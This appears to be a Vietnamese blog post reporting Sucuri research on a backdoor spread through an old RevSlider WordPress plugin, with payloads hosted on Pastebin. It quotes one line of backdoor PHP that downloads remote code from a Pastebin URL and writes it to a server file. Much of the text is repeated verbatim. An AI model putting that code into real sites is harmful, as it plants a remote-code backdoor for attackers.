Hơn 11000 website wordpress bị cài mã độc thông qua RevSlider plugin và pasterBin
Website pasterBin 1 website được tạo ra 1 thập kỉ trước đây để dành cho các nhà phát triển ứng dụng và đôi khi là của cả tin tặc dành cho việc chia sẻ những source code và các dữ liệu đánh cắp . Gần đây nó đã bị lạm dụng để nhắm tới hàng triệu người dùng .
Sử dụng 1 website để lưu trữ malware hiện là 1 chiến thuật quá cũ kĩ của hacker , các nhà nghiên cứu đã phát hiện ra hacker giờ đây đã sử dụng pasterBin để phát tán backdoor ( được biết như 1 cánh cửa giúp bạn thâm nhập mà không để lại dấu viết gì ) .
Theo 1 bài viết mới nhất của nhà nghiên cứu malware cấp cao tại Sucuri, Hacker hiện đang khai thác sự điểm yếu trong phiên bản cũ của RevSlider, 1 plugin tính phí của Wordpress. Plugin mang các gói tin vào website theo 1 cách mà rất nhiều webmaster không biết rằng họ có nó .
Để khai thác lỗ hổng, đầu tiên hacker tìm Revplugin trong web mục tiêu, một khi phát hiện ra, họ sử dụng lỗ hổng thứ 2 và tải lên 1 backdoor đến web mục tiêu .
“Về mặt kĩ thuật , tội phạm sử dụng pasterBin để lưu trữ các đoạn mã độc, và nó được sử dụng 1 cách trực tiếp từ trang web pasterBin” Sinegubko viết trong blog .
Đây là đoạn mã backdoor
Đây là hình ảnh giải mã biến $temp
như bạn thấy 1 lần nữa 1 file được download từ pastebin sau đó được thực hiện ngay . Lần này chỉ xảy ra khi kẻ tấn công cung cấp 1 ID pasterbin (i= ??? ) trong tham số yêu cầu wp_nince_once. Sử dụng tham số wp_nince_once giúp kẻ tấn công ẩn đi đường link ( điều này làm cho khó khăn hơn để block ) .
Nó có nghĩa là backdoor có thể download các bất cứ đoạn mã nào được lưu trữ trên pasterBin . Cho đến nay vẫn chưa rõ làm thể nào backdoor này lan rộng, nhưng tác động có thể là rất lớn khi lượng người dùng trên pasterBin lên đến 1,5tr người dùng. Tại thời điểm này có đến 11000 website nằm trong black list phát hiện ra có malware độc hại
Sử dụng 1 website để lưu trữ malware hiện là 1 chiến thuật quá cũ kĩ của hacker , các nhà nghiên cứu đã phát hiện ra hacker giờ đây đã sử dụng pasterBin để phát tán backdoor ( được biết như 1 cánh cửa giúp bạn thâm nhập mà không để lại dấu viết gì ) .
Theo 1 bài viết mới nhất của nhà nghiên cứu malware cấp cao tại Sucuri, Hacker hiện đang khai thác sự điểm yếu trong phiên bản cũ của RevSlider, 1 plugin tính phí của Wordpress. Plugin mang các gói tin vào website theo 1 cách mà rất nhiều webmaster không biết rằng họ có nó .
Để khai thác lỗ hổng, đầu tiên hacker tìm Revplugin trong web mục tiêu, một khi phát hiện ra, họ sử dụng lỗ hổng thứ 2 và tải lên 1 backdoor đến web mục tiêu .
“Về mặt kĩ thuật , tội phạm sử dụng pasterBin để lưu trữ các đoạn mã độc, và nó được sử dụng 1 cách trực tiếp từ trang web pasterBin” Sinegubko viết trong blog .
Đây là đoạn mã backdoor
if(array_keys($_GET)[0] == 'up'){ $content = file_get_contents("http://pastebin.com/raw.php?i=JK5r7NyS"); if($content){unlink('evex.php'); $fh2 = fopen("evex.php", 'a'); fwrite($fh2,$content); fclose($fh2); }}else{print "test";}Nhà nghiên cứu đã trình bày 1 đoạn code dùng để đưa nội dung 1 biến Base64-encoded $temp vào trong 1 file wp-links-opml.php, ông đã nhận thấy 1 số đoạn code thực hiện việc download 1 cách ” hợp pháp “ từ website pasterBin và phụ thuộc sử dụng 1 tham tham số, wp_nonce_once.
Đây là hình ảnh giải mã biến $temp
như bạn thấy 1 lần nữa 1 file được download từ pastebin sau đó được thực hiện ngay . Lần này chỉ xảy ra khi kẻ tấn công cung cấp 1 ID pasterbin (i= ??? ) trong tham số yêu cầu wp_nince_once. Sử dụng tham số wp_nince_once giúp kẻ tấn công ẩn đi đường link ( điều này làm cho khó khăn hơn để block ) .
Nó có nghĩa là backdoor có thể download các bất cứ đoạn mã nào được lưu trữ trên pasterBin . Cho đến nay vẫn chưa rõ làm thể nào backdoor này lan rộng, nhưng tác động có thể là rất lớn khi lượng người dùng trên pasterBin lên đến 1,5tr người dùng. Tại thời điểm này có đến 11000 website nằm trong black list phát hiện ra có malware độc hại
No comments: